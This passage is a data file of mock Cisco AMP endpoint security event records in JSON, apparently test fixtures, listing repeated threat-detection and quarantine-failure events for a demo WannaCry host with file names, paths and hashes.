Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 